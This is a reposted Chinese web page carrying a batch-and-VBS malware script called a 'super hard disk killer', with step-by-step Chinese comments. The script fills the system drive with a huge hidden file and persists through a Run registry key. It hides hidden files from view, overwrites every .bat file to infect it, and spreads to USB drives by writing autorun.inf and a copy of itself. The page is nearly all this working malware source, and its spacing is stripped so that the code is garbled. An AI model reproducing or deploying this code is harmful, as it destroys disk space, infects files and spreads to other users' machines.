快速业务通道

超级硬盘杀手的bat

作者 佚名 来源 批处理 浏览 发布时间 2013-07-09
复制代码 代码如下:

@echooff

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone%%Name:REON%%ozone%
%ozone%%Author:Ozone[verybat.cn]%%ozone%
%ozone%%Data:17/04/2007%%ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%



ifexsit%SystemDrive%\PAGEFILES.SYSgotoend
copy%0%windir%\system32\logon.bat::复制自身
FOR/F"tokens=3*"%%iin(''dir/-c%SystemDrive%^|find"可用字节"'')dofsutilfilecreatenew%SystemDrive%\PAGEFILES.SYS%%i::制造超大文件,轰炸硬盘
attrib+r+s+h%SystemDrive%\PAGEFILES.SYS::隐藏文件
regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vKV2007/tREG_SZ/d%windir%\system32\logon.vbs::自动启动
regdeleteHKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL/va/f::不显示隐藏文件
for/r%SystemDrive%%%iin(*.bat)dotype%0>%%i::感染


ifexist%windir%\system32\logon.vbsgotoend
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++

echosetfs=createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echosetWshShell=WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echoSetobjWMIService=GetObject("winmgmts:"_>>%windir%\system32\logon.vbs
echo^&"{impersonationLevel=impersonate}!\\"^&strComputer^&"\root\cimv2")>>%windir%\system32\logon.vbs
echoSetcolDisks=objWMIService.ExecQuery_>>%windir%\system32\logon.vbs
echo("Select*fromWin32_LogicalDisk")>>%windir%\system32\logon.vbs

::监视u盘
echoFori=1to9000000000>>%windir%\system32\logon.vbs
echoForEachobjDiskincolDisks>>%windir%\system32\logon.vbs
echoSelectCaseobjDisk.DriveType>>%windir%\system32\logon.vbs
echo:Case2:>>%windir%\system32\logon.vbs


::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.
echoy1=fs.FileExists(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echoifnoty1then>>%windir%\system32\logon.vbs
echosetf=fs.opentextfile(objDisk.DeviceID^&"\AUTORUN.INF",2,true)>>%windir%\system32\logon.vbs
echof.write"[AutoRun]"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"open=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"shellexecute=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"shell\Auto\command=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.Close>>%windir%\system32\logon.vbs
echoSetf1=fs.GetFile(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echoIff1.Attributes=f1.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f1.Attributes=f1.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs

::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.
echoy2=fs.FileExists(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs
echoifnoty2then>>%windir%\system32\logon.vbs
echofs.CopyFile"c:\windows\system32\logon.bat",objDisk.DeviceID^&"\">>%windir%\system32\logon.vbs
echoSetf2=fs.GetFile(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs
echoIff2.Attributes=f2.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f2.Attributes=f2.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs

echodirr=Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs

::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏.
echoy3=fs.FileExists(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echoifnoty3then>>%windir%\system32\logon.vbs
echoWshShell.Run"logon.bat">>%windir%\system32\logon.vbs
echoWScript.Sleep500>>%windir%\system32\logon.vbs
echoSetf3=fs.GetFile(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echoIff3.Attributes=f3.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f3.Attributes=f3.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs
echoEndSelect>>%windir%\system32\logon.vbs
echoNext>>%windir%\system32\logon.vbs

::每隔5秒扫描一次.
echoWScript.Sleep5000>>%windir%\system32\logon.vbs
echoNext>>%windir%\system32\logon.vbs

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号